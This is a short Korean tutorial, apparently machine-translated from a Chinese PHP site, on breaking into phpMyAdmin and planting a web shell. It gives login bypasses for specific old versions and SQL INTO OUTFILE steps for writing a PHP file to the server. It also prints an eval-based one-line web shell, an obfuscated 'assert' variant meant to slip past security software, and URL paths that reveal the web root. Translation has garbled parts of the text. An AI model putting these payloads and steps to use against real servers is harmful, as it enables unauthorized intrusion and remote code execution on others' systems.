phpmyadmin의 다음 튜토리얼 칼럼에서는 PHPmyadmin 취약점과 셸 얻기에 대해 소개할 예정입니다. 이 칼럼이 필요한 친구들에게 도움이 되기를 바랍니다!
phpmyadmin에는 상대적으로 많은 허점이 있습니다. 코드 감사에 대해 깊이 있는 분들도 저에게 몇 가지 허점을 공유하고 싶습니다
phpmyadmin2.11.3-2.11 .4 이 두 버전에는 범용 비밀번호가 있습니다. 'localhost'@'@"를 계정번호로 직접 사용하면 비밀번호를 입력할 필요가 없습니다.
phpmyadmin2.11.9.2 빈 비밀번호가 있습니다. 이 버전에서는 루트 사용자로 직접 로그인하세요. 비밀번호가 필요하지 않습니다.
이 내용을 찾으려면 자신의 스크립트나 검색 엔진 등을 사용하세요. t, 여기서 신경쓰지 마세요.
셸 얻기에 대해 ---->루트 권한 및 쓰기 권한 있음---"내보낸 디렉터리에 쓰기 권한이 있습니다---" 경우에 따라 둘 다 가지고 있지만 서버의 일부 구성은 여전히 여기에 영향을 미칩니다.
getshell 전에 먼저 데이터베이스를 입력하세요
먼저, SQL 문을 사용하고, 테이블을 만들고, 필드를 추가하고, 필드가 한 문장이면 이를 PHP 파일로 내보낸 다음 마지막으로 테이블을 삭제합니다. 이것이 가장 안전한 방법입니다
Create TABLE table (column text NOT NULL)
Insert INTO table (column) VALUES('f0a5bc860caf7e9b478c25a8f3caefec')
테이블에서 열을 _utfile '경로'로 선택
TABLE IF EXISTS 테이블 삭제
두 번째 방법 , 직접 쓰는 방법
'문장' INTO _UTFILE '경로 선택
여러 가지 방법이 있지만 일반적인 원칙은 동일합니다
그러면 일반적으로 한 문장으로 단어가 모두
<span style="font-size: 16px;"><?php @eval($_POST[x])?><br/></span>
개를 키우는 경우 "살인을 피하십시오"라는 문장을 사용하십시오. 개를 넘기기 위해 설날 전에 만들었던 문장
<span style="font-size: 16px;"><?php<br/> $a = 's';<br/> $str = str_repeat($a,2);<br/> $to = $_POST;<br/> //echo $str;<br/> $exp = 'a'.$str[0].$str[1].'e'.'r'.'t';<br/> $exp($to['x'])<br/> ?><br/></span>
길을 찾고 계시다면
<span style="font-size: 16px;">1// 利用phpinfo.php<br/> 2//利用phpmyadmin的一些文件报错,下面都是网上通用的<br/> /phpMyAdmin/index.php?lang[]=1<br/> /phpMyAdmin/phpinfo.php<br/> /load_file()<br/> /phpmyadmin/themes/darkblue_orange/layout.inc.php<br/> /phpmyadmin/libraries/select_lang.lib.php<br/> /phpmyadmin/libraries/lect_lang.lib.php<br/> /phpmyadmin/libraries/mcrypt.lib.php<br/> /phpmyadmin/libraries/export/xls.php<br/></span>
3//더 나아가서, 웹사이트 패키지 경로를 알고 있으면 알 수 있을 것입니다.
스크립트는 IP를 스캔하여 phpmyadmin이 있음을 보여줍니다. ㅋㅋㅋ
. . . 이 작업은 확실히 완료되었습니다. 권리를 에스컬레이션할 필요가 없습니다.
위 내용은 PHPmyadmin 취약점 분석 및 쉘 소개의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!